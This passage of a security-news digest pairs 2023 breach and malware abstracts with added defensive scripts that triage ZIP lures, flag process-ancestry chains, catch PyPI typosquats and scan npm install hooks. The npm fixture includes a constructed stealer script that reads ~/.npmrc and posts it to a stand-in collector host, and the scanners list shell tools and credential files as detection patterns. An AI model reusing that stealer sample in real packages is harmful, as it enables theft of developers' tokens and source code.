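def build_archive(entries: dict) -> bytes:
    """Construct a ZIP in memory from {name: bytes}; sample data, not a real attachment."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


FAKE_JPEG = JPEG_MAGIC + b"\xe0" + b"\x00" * 64      # JFIF-looking stub (constructed)

# Layout from the article: three JPG decoys and weblinks.cmd (image names assumed).
SAMPLE_LURE = build_archive({
    "IMG_0231.jpg": FAKE_JPEG, "IMG_0232.jpg": FAKE_JPEG, "IMG_0233.jpg": FAKE_JPEG,
    "weblinks.cmd": b'@echo off\r\nstart "" https://decoy.example.invalid/page\r\n',
})
SAMPLE_BENIGN = build_archive({"IMG_0231.jpg": FAKE_JPEG, "IMG_0232.jpg": FAKE_JPEG})
SAMPLE_DISGUISED = build_archive({"invoice.jpg": MZ_MAGIC + b"\x90\x00" + b"\x00" * 64})

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN), ("disguised", SAMPLE_DISGUISED)):
        verdict = triage_zip(blob)
        print(label, "suspicious" if verdict["suspicious"] else "clean", verdict["findings"])
```

The extension lists are deliberately broad; the check that matters most in practice is the magic-byte comparison, because the script-plus-decoys rule is trivially defeated by shipping the script on its own and the decoys in a second archive.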
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say.Cyware
September 01, 2023 – Malware
Russian State-Backed ‘Infamous Chisel’ Android Malware Targets Ukrainian Military
Abstract
Cybersecurity and intelligence agencies from Australia, Canada, New Zealand, the U.K., and the U.S. on Thursday disclosed details of a mobile malware strain targeting Android devices used by the Ukrainian military. The malicious software, dubbed Infamous Chisel and attributed to a Russian state-sponsored actor called Sandworm, has capabilities to "enable unauthorized access to compromised devices, scan files, monitor traffic, and periodically steal sensitive information." Some aspects of the malware were uncovered by the Security Service of Ukraine (SBU) earlier in August, highlighting unsuccessful attempts on part of the adversary to penetrate Ukrainian military networks and gather valuable intelligence. It's said that Russian forces captured tablets used by Ukraine on the battlefield, using them as a foothold to remotely disseminate the malware to other devices by using the Android Debug Bridge (ADB) command-line tool. Sandworm, also known by the names FROZENBARENTS, Ir ... The Hacker News
September 1, 2023 – Breach
LogicMonitor Customers Hit by Hackers Due to Weak Default Passwords
Abstract
Some customers of the network security company LogicMonitor have been hacked due to the use of default passwords, TechCrunch has learned. A LogicMonitor spokesperson confirmed “a security incident” affecting some of the company’s customers.Cyware
September 01, 2023 – Phishing
New SuperBear Trojan Emerges in Targeted Phishing Attack on South Korean Activists
Abstract
A new phishing attack likely targeting civil society groups in South Korea has led to the discovery of a novel remote access trojan called SuperBear. The intrusion singled out an unnamed activist, who was contacted in late August 2023 and received a malicious LNK file from an address impersonating a member of the organization, non-profit entity Interlabs said in a new report. The LNK file, upon execution, launches a PowerShell command to execute a Visual Basic script that, in turn, fetches the next-stage payloads from a legitimate but compromised WordPress website. This includes the Autoit3.exe binary ("solmir.pdb") and an AutoIt script ("solmir_1.pdb") that's launched using the former. The AutoIt script, for its part, performs process injection using a process hollowing technique, in which malicious code is inserted into a process that's in a suspended state. In this case, an instance of Explorer.exe is spawned to inject a never-before-seen RAT referred to as SuperBear th ... The Hacker News
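Both the SuperBear chain above (LNK, PowerShell, VBS, a renamed AutoIt3 binary, then a suspended Explorer.exe) and the APT28 weblinks.cmd chain earlier on this page (CMD, VBS, BAT, then whoami) are easiest to catch as process ancestry rather than as file hashes. The detector below is an added example (not Interlabs', CERT-UA's or The Hacker News' code) that walks parent links over process-creation events and reports a process when the last few names in its ancestry match a rule. It matches on the PE OriginalFileName rather than the on-disk name, which is what lets it see "solmir.pdb" as AutoIt3.exe. The events are constructed to resemble Sysmon Event ID 1 fields; PIDs, paths and command lines are assumptions.

```python
"""Ancestry-chain detection over process-creation events.

Added example, not Interlabs', CERT-UA's or The Hacker News' code. It covers
the two chains described on this page: the SuperBear loader (LNK -> PowerShell
-> VBS -> AutoIt3 -> hollowed Explorer) and the APT28 weblinks.cmd chain
(CMD -> VBS -> BAT -> whoami). The events are constructed to resemble Sysmon
Event ID 1 fields; PIDs, paths and command lines are assumptions.
"""
import os
from collections import namedtuple

# original = PE OriginalFileName; it survives when the binary on disk is
# renamed (the article's AutoIt3.exe was dropped as "solmir.pdb").
Event = namedtuple("Event", "pid ppid image original cmdline")

# Each rule is a run of image names, oldest ancestor first, that must end at
# the process being evaluated.
RULES = {
    "AutoIt spawning explorer.exe (hollowing host, SuperBear)": ["autoit3.exe", "explorer.exe"],
    "powershell -> wscript -> AutoIt (SuperBear loader)": ["powershell.exe", "wscript.exe", "autoit3.exe"],
    "wscript -> cmd -> whoami (APT28 weblinks.cmd chain)": ["wscript.exe", "cmd.exe", "whoami.exe"],
}


def image_name(ev: Event) -> str:
    """Prefer the PE OriginalFileName over the on-disk name so renaming does not evade a rule."""
    name = ev.original or os.path.basename(ev.image.replace("\\", "/"))
    return name.lower()


def ancestry(events, pid):
    """Image names from the oldest known ancestor down to `pid`.

    Production telemetry must key on ProcessGuid (or start time) because PIDs
    are reused; a plain pid map is enough for this constructed sample.
    """
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]))
        pid = by_pid[pid].ppid
    chain.reverse()
    return chain


def detect(events):
    """Sorted (rule, pid) pairs; each chain is reported once, at the process that completes it."""
    hits = set()
    for ev in events:
        chain = ancestry(events, ev.pid)
        for rule, pattern in RULES.items():
            if chain[-len(pattern):] == pattern:
                hits.add((rule, ev.pid))
    return sorted(hits)


SAMPLE_EVENTS = [
    # Normal desktop session root
    Event(4, 0, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    # APT28-style chain: weblinks.cmd -> VBS -> BAT -> whoami (script names assumed)
    Event(500, 4, r"C:\Windows\System32\cmd.exe", "Cmd.Exe", r'cmd /c "C:\Users\u\Downloads\weblinks.cmd"'),
    Event(510, 500, r"C:\Windows\System32\wscript.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\stage.vbs"),
    Event(520, 510, r"C:\Windows\System32\cmd.exe", "Cmd.Exe", r"cmd /c C:\Users\u\AppData\Local\Temp\stage.bat"),
    Event(530, 520, r"C:\Windows\System32\whoami.exe", "whoami.exe", "whoami"),
    # SuperBear-style chain: LNK -> PowerShell -> VBS -> renamed AutoIt3 -> explorer.exe
    Event(600, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "PowerShell.EXE",
          "powershell.exe -WindowStyle Hidden -Command launch.vbs"),
    Event(610, 600, r"C:\Windows\System32\wscript.exe", "wscript.exe", r"wscript.exe C:\Users\u\AppData\Local\Temp\stage2.vbs"),
    Event(620, 610, r"C:\Users\u\AppData\Local\Temp\solmir.pdb", "AutoIt3.exe", "solmir.pdb solmir_1.pdb"),
    Event(630, 620, r"C:\Windows\explorer.exe", "EXPLORER.EXE", "explorer.exe"),
    # Benign lookalike: an admin running whoami from an interactive console
    Event(800, 4, r"C:\Windows\System32\cmd.exe", "Cmd.Exe", "cmd"),
    Event(810, 800, r"C:\Windows\System32\whoami.exe", "whoami.exe", "whoami /groups"),
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}: {' -> '.join(ancestry(SAMPLE_EVENTS, pid))}")
```

The rules are anchored at the tail of the ancestry on purpose: the console whoami (pid 810) has the same leaf as the APT28 rule but lacks the script host two levels up, so it stays quiet.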
September 1, 2023 – Ransomware
Free Decryptor Available for ‘Key Group’ Ransomware
Abstract
Also known as keygroup777, Key Group is a Russian-speaking cybercrime actor known for selling personally identifiable information (PII) and access to compromised devices, as well as extorting victims for money.Cyware
September 01, 2023 – General
It’s a Zero-day? It’s Malware? No! It’s Username and Password
Abstract
As cyber threats continue to evolve, adversaries are deploying a range of tools to breach security defenses and compromise sensitive data. Surprisingly, one of the most potent weapons in their arsenal is not malicious code but simply stolen or weak usernames and passwords. This article explores the seriousness of compromised credentials, the challenges they present to security solutions, and the importance of implementing robust measures to protect Active Directory (AD) environments. Additionally, we introduce Silverfort Unified Identity Protection, a comprehensive solution that offers enhanced security for AD environments against the misuse of compromised credentials. The Power of Stolen Credentials: Full Access to Any Resource In the world of cyberattacks, stolen usernames and passwords are a highly effective means of gaining unauthorized access to networks and systems. They grant adversaries an entry point, allowing them subsequent access to sensitive on-prem and cloud resource ... The Hacker News
September 1, 2023 – Breach
Sourcegraph Discloses Data Breach Following Access Token Leak
Abstract
According to the platform, the admin access token used in the attack was leaked in a July 14 commit that passed internal code analysis tools. The token “had broad privileges to view and modify account information on Sourcegraph.com”.Cyware
September 01, 2023 – Phishing
Classiscam Scam-as-a-Service Raked $64.5 Million During the COVID-19 Pandemic
Abstract
The Classiscam scam-as-a-service program has reaped the criminal actors $64.5 million in illicit earnings since its emergence in 2019. "Classiscam campaigns initially started out on classified sites, on which scammers placed fake advertisements and used social engineering techniques to convince users to pay for goods by transferring money to bank cards," Group-IB said in a new report. "Since then, Classiscam campaigns have become highly automated, and can be run on a host of other services, such as online marketplaces and carpooling sites." A majority of victims are based in Europe (62.2%), followed by the Middle East and Africa (18.2%), and the Asia-Pacific (13%). Germany, Poland, Spain, Italy, and Romania accounted for the highest number of fraudulent transactions registered in Classiscam chats. First discovered in 2019, Classiscam is an umbrella term for an operation that encompasses 1,366 distinct groups on Telegram. The activities first targeted Russi ... The Hacker News
August 31, 2023 – Attack
Earth Estries Group Targets Government and IT Organizations
Abstract
A new cyberespionage campaign by a group called Earth Estries has been discovered, targeting governments and organizations in the technology sector. Active since at least 2020, the group shows similarities with another APT group called FamousSparrow. It is essential for organizations to track and analyze t ... Cyware
August 31, 2023 – Malware
SapphireStealer Malware: A Gateway to Espionage and Ransomware Operations
Abstract
An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants. "Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion," Cisco Talos researcher Edmund Brumaghin said in a report shared with The Hacker News. An entire ecosystem has developed over time that allows both financially motivated and nation-state actors to use services from purveyors of stealer malware to carry out various kinds of attacks. Viewed in that light, such malware not only represents an evolution of the cybercrime-as-a-service (CaaS) model, it also lets other threat actors monetize the stolen data to distribute ransomware, conduct data theft, and other maliciou ... The Hacker News
August 31, 2023 – Criminals
Unmasking Trickbot, One of the World’s Top Cybercrime Gangs
Abstract
Maksim Sergeevich Galochkin, a member of the Russian cybercrime syndicate Trickbot, has been identified by cybercrime researchers. The identification of Galochkin comes after a comprehensive investigation into leaked data from the Trickbot group.Cyware
August 31, 2023 – Malware
North Korean Hackers Deploy New Malicious Python Packages in PyPI Repository
Abstract
Three additional rogue Python packages have been discovered in the Package Index (PyPI) repository as part of an ongoing malicious software supply chain campaign called VMConnect, with signs pointing to the involvement of North Korean state-sponsored threat actors. The findings come from ReversingLabs, which detected the packages tablediter, request-plus, and requestspro. First disclosed at the start of the month by the company and Sonatype, VMConnect refers to a collection of Python packages that mimic popular open-source Python tools to download an unknown second-stage malware. The latest tranche is no different, with ReversingLabs noting that the bad actors are disguising their packages and making them appear trustworthy by using typosquatting techniques to impersonate prettytable and requests and confuse developers. The nefarious code within tablediter is designed to run in an endless execution loop in which a remote server is polled periodically to retrieve and execute ... The Hacker News
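The three names above squat on real packages in two different ways: request-plus and requestspro bolt an affix onto "requests", while tablediter only shares a fragment with "prettytable". The checker below is an added example (not ReversingLabs' or Sonatype's tooling) that a CI step could run over a requirements file: it applies PEP 503 name normalisation, strips common affixes, then compares the remainder to a list of popular packages by edit distance and by longest shared substring. The popular-package list, the affix list and the requirements file are constructed for the example; the three flagged names are the ones reported in the article.

```python
"""Flag dependency names that squat on popular PyPI packages.

Added example, not ReversingLabs' or Sonatype's tooling. The popular-package
list, the affix list and the requirements file are constructed for the
example; the three flagged names (tablediter, request-plus, requestspro) are
the ones reported in the article.
"""
import re

POPULAR = ["requests", "prettytable", "urllib3", "numpy", "pandas", "setuptools"]
# Affixes squatters bolt onto a real name so it reads like an official variant.
AFFIXES = ("plus", "pro", "python", "py", "lib", "tools", "utils", "dev", "2", "3")


def normalize(name: str) -> str:
    """PEP 503 normalisation: case-fold and collapse runs of -, _ and . to one '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def strip_affixes(name: str) -> str:
    """Peel known affixes off both ends: 'request-plus' -> 'request', 'requestspro' -> 'requests'."""
    core = normalize(name).replace("-", "")
    changed = True
    while changed:
        changed = False
        for affix in AFFIXES:
            if len(core) <= len(affix) + 2:
                continue
            if core.startswith(affix):
                core, changed = core[len(affix):], True
            elif core.endswith(affix):
                core, changed = core[:-len(affix)], True
    return core


def levenshtein(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def longest_common_substring(a: str, b: str) -> int:
    best, prev = 0, [0] * (len(b) + 1)
    for ca in a:
        cur = [0]
        for j, cb in enumerate(b, 1):
            cur.append(prev[j - 1] + 1 if ca == cb else 0)
        best, prev = max(best, max(cur)), cur
    return best


def squat_candidates(name: str, popular=POPULAR):
    """Popular names `name` may be impersonating, each with the reason it matched."""
    norm, core = normalize(name), strip_affixes(name)
    hits = []
    for real in popular:
        real_norm = normalize(real)
        real_core = real_norm.replace("-", "")
        if norm == real_norm:
            continue  # it is the genuine package
        if core == real_core:
            hits.append((real, "real name with an affix added"))
        elif levenshtein(core, real_core) <= 1:
            hits.append((real, "one edit away from the real name"))
        elif longest_common_substring(core, real_core) >= 5 and len(core) <= len(real_core) + 2:
            # Loose heuristic (it is what catches tablediter vs prettytable);
            # expect false positives, so treat it as "review", not "block".
            hits.append((real, "shares a long fragment with the real name"))
    return hits


def check_requirements(text: str) -> dict:
    """Return {requirement name: candidates} for every suspicious line of a requirements.txt."""
    flagged = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        match = re.match(r"[A-Za-z0-9][A-Za-z0-9._-]*", line)
        if not line or line.startswith("-") or not match:
            continue
        candidates = squat_candidates(match.group(0))
        if candidates:
            flagged[match.group(0)] = candidates
    return flagged


SAMPLE_REQUIREMENTS = """\
# constructed requirements file for the example
requests==2.31.0
prettytable>=3.8
numpy
pandas==2.0.3
urllib3<2
setuptools
tablediter
request-plus
requestspro>=1.0
"""

if __name__ == "__main__":
    for name, candidates in check_requirements(SAMPLE_REQUIREMENTS).items():
        print(name, "->", candidates)
```

Name similarity is only a first filter; the definitive signal for this campaign is behavioural (an install or import that starts polling a remote server), so a hit here should route the package to sandbox execution rather than straight to a block list.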
August 31, 2023 – Malware
BadBazaar Espionage Tool Targets Android Users
Abstract
ESET discovered two active campaigns distributing trojanized Signal and Telegram apps that aim to exfiltrate user data and spy on victims’ communications. They have been spreading the BadBazaar Android spyware. Mitigation includes cautious app selection, avoiding suspicious sources, and maintaining ... Cyware
August 31, 2023 – General
Numbers Don’t Lie: Exposing the Harsh Truths of Cyberattacks in New Report
Abstract
How often do cyberattacks happen? How frequently do threat actors target businesses and governments around the world? The BlackBerry® Threat Research and Intelligence Team recently analyzed 90 days of real-world data to answer these questions. Full results are in the latest BlackBerry Global Threat Intelligence Report, but read on for a teaser of several interesting cyber attack statistics. Analyzing Real-World Cyberattacks In their most recent quarterly report, BlackBerry threat researchers analyzed the onslaught of malware-based attacks from December 2022 to February 2023. During that time, BlackBerry's AI-powered endpoint protection solution detected and blocked a total of 1,578,733 malware-based cyberattacks targeting customers. 90 Days of Cyberattacks Based on analysis of cyberattacks detected and blocked during the 90-day window, the BlackBerry Threat Research and Intelligence Team recorded the following statistics: Total number of malware-based attacks: 1,578,73 ... The Hacker News
August 31, 2023 – Attack
VMConnect Supply Chain Attack Continues, Evidence Points to North Korea
Abstract
The recently discovered malicious Python packages, such as tablediter, request-plus, and requestspro, are believed to be a continuation of the VMConnect campaign attributed to North Korean threat actors.Cyware
August 31, 2023 – Attack
Earth Estries’ Espionage Campaign Targets Governments and Tech Titans Across Continents
Abstract
A hacking outfit nicknamed Earth Estries has been attributed to a new, ongoing cyber espionage campaign targeting government and technology industries based in the Philippines, Taiwan, Malaysia, South Africa, Germany, and the U.S. "The threat actors behind Earth Estries are working with high-level resources and functioning with sophisticated skills and experience in cyber espionage and illicit activities," Trend Micro researchers Ted Lee, Lenart Bermejo, Hara Hiroaki, Leon M Chang, and Gilbert Sison said. Active since at least 2020, Earth Estries is said to share tactical overlaps with another nation-state group tracked as FamousSparrow, which was first exposed by ESET in 2021 as exploiting ProxyLogon flaws in Microsoft Exchange Server to penetrate hospitality, government, engineering, and legal sectors. It's worth pointing out that commonalities have also been unearthed between FamousSparrow and UNC4841, an uncategorized activity cluster held responsible for ... The Hacker News
August 31, 2023 – Vulnerabilities
Netgear Releases Patches for Two High-Severity Vulnerabilities
Abstract
The network hardware giant Netgear has disclosed two vulnerabilities affecting one of its router models and its network management software. One of the flaws, tracked as CVE-2023-41183, affects Netgear’s Orbi 760 routers.Cyware
August 31, 2023 – Breach
Forever 21 Data Breach Leaks Personal Information of Over 539,000 Individuals
Abstract
Forever 21 experienced a data breach that compromised the personal information, including names and Social Security numbers, of over 539,000 individuals. The breach occurred between January 5, 2023, and March 21, 2023.Cyware
August 31, 2023 – Business
Compliance and Risk Management Startup Hyperproof Raises $40M
Abstract
Hyperproof, a software-as-a-service risk and compliance management company, today announced that it raised $40 million in a funding round led by Riverwood Capital, with participation from Toba Capital, an early-stage VC firm.Cyware
August 31, 2023 – Breach
National Safety Council Data Leak Impacts Credentials of NASA, Tesla, DoJ, Verizon, and 2000 Other Firms
Abstract
The National Safety Council has leaked nearly 10,000 emails and passwords of their members, exposing 2000 companies, including governmental organizations and big corporations.Cyware
August 31, 2023 – Education
The Power of Passive OS Fingerprinting for Accurate IoT Device Identification
Abstract
To effectively safeguard against the risks of IoT sprawl, continuous monitoring and absolute control are crucial. However, that requires accurate identification of all IoT devices and operating systems (OSes) within the enterprise network.Cyware
August 31, 2023
APT Attacks From ‘Earth Estries’ Hit Governments, Tech Firms Across the Globe
Abstract
Earth Estries uses advanced techniques such as DLL sideloading and has developed three custom malware tools: Zingdoor, TrillClient, and HemiGate. It has been active since at least 2020 and has similarities with another group called FamousSparrow.Cyware
August 30, 2023 – Solution
GitHub Enterprise Server Gets New Security Capabilities
Abstract
Now, teams using GitHub Actions can also create their own custom deployment protection rules, to ensure that only “the deployments that pass all quality, security, and manual approval requirements make it to production,” GitHub explained.Cyware
August 30, 2023 – Vulnerabilities
Hackers Can Exploit Windows Container Isolation Framework to Bypass Endpoint Security
Abstract
New findings show that malicious actors could leverage a sneaky malware detection evasion technique and bypass endpoint security solutions by manipulating the Windows Container Isolation Framework. The findings were presented by Deep Instinct security researcher Daniel Avinoam at the DEF CON security conference held earlier this month. Microsoft's container architecture (and by extension, Windows Sandbox) uses what's called a dynamically generated image to separate the file system from each container to the host and at the same time avoid duplication of system files. It's nothing but an "operating system image that has clean copies of files that can change, but links to files that cannot change that are in the Windows image that already exists on the host," thereby bringing down the overall size for a full OS. "The result is images that contain 'ghost files,' which store no actual data but point to a different volume on the system," ... The Hacker News
August 30, 2023 – Disinformation
Russians Impersonate Washington Post and Fox News With Anti-Ukraine Stories
Abstract
This operation, named Doppelganger, has persevered in its attempts to influence Western opinion despite numerous disruptions by Meta and “continuous scrutiny by platforms and researchers.”Cyware
August 30, 2023 – Malware
MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature
Abstract
A previously undocumented Android banking trojan dubbed MMRat has been observed targeting mobile users in Southeast Asia since late June 2023 to remotely commandeer the devices and perform financial fraud. "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim's device," Trend Micro said. What makes MMRat stand apart from others of its kind is the use of a customized command-and-control (C2) protocol based on protocol buffers (aka protobuf) to efficiently transfer large volumes of data from compromised handsets, demonstrating the growing sophistication of Android malware. Possible targets based on the language used in the phishing pages include Indonesia, Vietnam, Singapore, and the Philippines. The entry point of the attacks is a network of phishing sites that mimic offici ... The Hacker News
August 30, 2023
Pay Our Ransom Instead of GDPR Fine, Cybercrime Gang Tells Its Targets
Abstract
The hackers behind Ransomed are probably linked to other data leak websites like BreachForums and Exposed, Flashpoint said. Some of these sites have shut down due to money problems or poor management, the researchers said.Cyware
August 30, 2023 – Malware
China-Linked BadBazaar Android Spyware Targeting Signal and Telegram Users
Abstract
Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF. "Most likely active since July 2020 and since July 2022, respectively, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites representing the malicious apps Signal Plus Messenger and FlyGram," security researcher Lukáš Štefanko said in a new report shared with The Hacker News. Victims have been primarily detected in Germany, Poland, and the U.S., followed by Ukraine, Australia, Brazil, Denmark, Congo-Kinshasa, Hong Kong, Hungary, Lithuania, the Netherlands, Portugal, Singapore, Spain, and Yemen. BadBazaar was first documented by Lookout in November 2022 as targeting the U ... The Hacker News
August 30, 2023 – Phishing
AiTM Attacks Evolve: Warns Microsoft
Abstract
Microsoft is alerting about a rise in AiTM phishing methods within the PhaaS cybercrime model, enabling widespread large-scale phishing campaigns. The primary aim of these attacks is to steal session cookies, allowing malicious actors to gain entry to privileged systems without needing to authentic ... Cyware
August 30, 2023 – Education
How to Prevent ChatGPT From Stealing Your Content & Traffic
Abstract
ChatGPT and similar large language models (LLMs) have added further complexity to the ever-growing online threat landscape. Cybercriminals no longer need advanced coding skills to execute fraud and other damaging attacks against online businesses and customers, thanks to bots-as-a-service, residential proxies, CAPTCHA farms, and other easily accessible tools. Now, the latest technology damaging businesses' bottom line is ChatGPT. Not only have ChatGPT, OpenAI, and other LLMs raised ethical issues by training their models on scraped data from across the internet. LLMs are negatively impacting enterprises' web traffic, which can be extremely damaging to business. 3 Risks Presented by LLMs, ChatGPT, & ChatGPT Plugins Among the threats ChatGPT and ChatGPT plugins can pose against online businesses, there are three key risks we will focus on: Content theft (or republishing data without permission from the original source) can hurt the authority, SEO rankings, and perceived ... The Hacker News
August 30, 2023 – Malware
Malicious npm Packages Aim to Target Developers for Source Code Theft
Abstract
An unknown threat actor is leveraging malicious npm packages to target developers with an aim to steal source code and configuration files from victim machines, a sign of how threats lurk consistently in open-source repositories. "The threat actor behind this campaign has been linked to malicious activity dating back to 2021," software supply chain security firm Checkmarx said in a report shared with The Hacker News. "Since then, they have continuously published malicious packages." The latest report is a continuation of the same campaign that Phylum disclosed at the start of the month in which a number of npm modules were engineered to exfiltrate valuable information to a remote server. The packages, by design, are configured to execute immediately post-installation by means of a postinstall hook defined in the package.json file. It triggers the launch of preinstall.js, which spawns index.js to capture the system metadata as well as harvest source code and ... The Hacker News
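The install-time hook is the whole trick: npm runs a package's preinstall, install, postinstall and prepare scripts during `npm install` without the developer asking. The scanner below is an added example (not Checkmarx's or Phylum's tooling) that reads a package manifest, reports which lifecycle hooks exist, follows the `node <file>` they invoke and the `./other-file` references inside those files, and pattern-matches each script for the stealer behaviours the article describes: spawning a detached process, walking the file tree, reading home-directory config files, and making an outbound request. The manifest and the two scripts are constructed to mirror the reported layout (a postinstall hook that starts preinstall.js, which spawns index.js); the package name, file contents and collector host are assumptions.

```python
"""Inspect an npm package for install-time lifecycle hooks and what they run.

Added example, not Checkmarx's or Phylum's tooling. The manifest and the two
scripts below are constructed to mirror the layout described in the article
(postinstall -> preinstall.js -> index.js); the package name, file contents
and the collector host are assumptions.
"""
import re

# npm runs these during `npm install` without the user asking for them.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "preprepare", "postprepare")

# Things a build step rarely needs but a stealer always does.
SUSPICIOUS_PATTERNS = {
    "network call": re.compile(r"(https?\.request\(|\bfetch\(|\baxios\b|https?://)"),
    "reads home or config files": re.compile(r"(homedir\(\)|\.npmrc|\.ssh\b|\.gitconfig|\.env\b)"),
    "walks the file tree": re.compile(r"\b(readdirSync|readdir|glob)\b"),
    "spawns another process": re.compile(r"\b(child_process|spawn|execSync|exec|curl|wget|sh|bash)\b"),
}
LOCAL_REF_RE = re.compile(r"""['"]\./([\w./-]+)['"]""")   # "./index.js" style references
NODE_ARG_RE = re.compile(r"\bnode\s+([\w./-]+)")          # the file a hook hands to node


def install_hooks(manifest: dict) -> dict:
    scripts = manifest.get("scripts") or {}
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


def scan_script(path: str, files: dict, seen: set, depth: int = 3) -> list:
    """Pattern-match one shipped script and follow its './x' references, depth-limited."""
    if depth == 0 or path in seen:
        return []
    seen.add(path)
    body = files.get(path)
    if body is None:
        return [f"{path}: referenced by a hook but not present in the package"]
    findings = [f"{path}: {label}" for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(body)]
    for ref in LOCAL_REF_RE.findall(body):
        ref = ref if ref.endswith(".js") else ref + ".js"
        findings += scan_script(ref, files, seen, depth - 1)
    return findings


def assess_package(manifest: dict, files: dict) -> dict:
    """`files` maps a path inside the tarball to its text. Returns hooks, findings and a verdict."""
    hooks = install_hooks(manifest)
    findings, seen = [], set()
    for hook, cmd in hooks.items():
        findings.append(f"{hook}: runs '{cmd}' at install time")
        findings += [f"{hook} command: {label}" for label, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        for target in NODE_ARG_RE.findall(cmd):
            findings += scan_script(target.lstrip("./"), files, seen)
    return {"hooks": hooks, "findings": findings, "suspicious": bool(findings)}


# Constructed sample mirroring the article's layout (names and contents assumed).
SAMPLE_MANIFEST = {"name": "example-squatted-pkg", "version": "1.0.3",
                   "scripts": {"postinstall": "node preinstall.js", "test": "mocha"}}
SAMPLE_FILES = {
    "preinstall.js": 'const { spawn } = require("child_process");\n'
                     'spawn(process.execPath, ["./index.js"], { detached: true, stdio: "ignore" }).unref();\n',
    "index.js": 'const fs = require("fs"), os = require("os"), https = require("https");\n'
                'const tree = fs.readdirSync(process.cwd());\n'
                'const secrets = fs.readFileSync(os.homedir() + "/.npmrc", "utf8");\n'
                'const req = https.request({ hostname: "collector.example.invalid", method: "POST", path: "/" });\n'
                'req.end(JSON.stringify({ tree, secrets }));\n',
}

if __name__ == "__main__":
    for line in assess_package(SAMPLE_MANIFEST, SAMPLE_FILES)["findings"]:
        print("-", line)
```

A hook by itself is not proof of anything (native addons legitimately compile in `install`), which is why the first finding is informational and the verdict rests on what the invoked scripts actually do. `npm install --ignore-scripts` is the blunt mitigation while a flagged package is reviewed.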
August 30, 2023 – Vulnerabilities
Alert: Juniper Firewalls, Openfire, and Apache RocketMQ Under Attack from New Exploits
Abstract
Recently disclosed security flaws impacting Juniper firewalls, Openfire, and Apache RocketMQ servers have come under active exploitation in the wild, according to multiple reports. The Shadowserver Foundation said that it's "seeing exploitation attempts from multiple IPs for Juniper J-Web CVE-2023-36844 (& friends) targeting /webauth_operation.php endpoint," the same day a proof-of-concept (PoC) became available. The issues, tracked as CVE-2023-36844, CVE-2023-36845, CVE-2023-36846, and CVE-2023-36847, reside in the J-Web component of Junos OS on Juniper SRX and EX Series. They could be chained by an unauthenticated, network-based attacker to execute arbitrary code on susceptible installations. Patches for the flaw were released on August 17, 2023, a week after which watchTowr Labs published a proof-of-concept (PoC) by combining CVE-2023-36846 and CVE-2023-36845 to execute a PHP file containing malicious shellcode. Currently, there are more than 8,200 Junip ... The Hacker News
August 30, 2023 – Vulnerabilities
Critical Vulnerability Alert: VMware Aria Operations Networks at Risk from Remote Attacks
Abstract
VMware has released software updates to correct two security vulnerabilities in Aria Operations for Networks that could be potentially exploited to bypass authentication and gain remote code execution. The most severe of the flaws is CVE-2023-34039 (CVSS score: 9.8), which relates to a case of authentication bypass arising as a result of a lack of unique cryptographic key generation. "A malicious actor with network access to Aria Operations for Networks could bypass SSH authentication to gain access to the Aria Operations for Networks CLI," the company said in an advisory. ProjectDiscovery researchers Harsh Jaiswal and Rahul Maini have been credited with discovering and reporting the issue. The second weakness, CVE-2023-20890 (CVSS score: 7.2), is an arbitrary file write vulnerability impacting Aria Operations for Networks that could be abused by an adversary with administrative access to write files to arbitrary locations and achieve remote code execution. Credited ... The Hacker News
August 30, 2023 – Policy and Law
FBI Dismantles QakBot Malware, Frees 700,000 Computers, Seizes $8.6 Million
Abstract
A coordinated law enforcement effort codenamed Operation Duck Hunt has felled QakBot, a notorious Windows malware family that's estimated to have compromised over 700,000 computers globally and facilitated financial fraud as well as ransomware. To that end, the U.S. Justice Department (DoJ) said the malware is "being deleted from victim computers, preventing it from doing any more harm," adding it seized more than $8.6 million in cryptocurrency in illicit profits. The cross-border exercise involved the participation of France, Germany, Latvia, Romania, the Netherlands, the U.K., and the U.S., alongside technical assistance from cybersecurity company Zscaler. The dismantling has been hailed as "the largest U.S.-led financial and technical disruption of a botnet infrastructure leveraged by cybercriminals." No arrests were announced. QakBot, also known as QBot and Pinkslipbot, started its life as a banking trojan in 2007 before morphing into a general-pu ... The Hacker News
August 29, 2023 – Breach
Japan’s Cybersecurity Agency Breached by Suspected Chinese Hackers: Report
Abstract
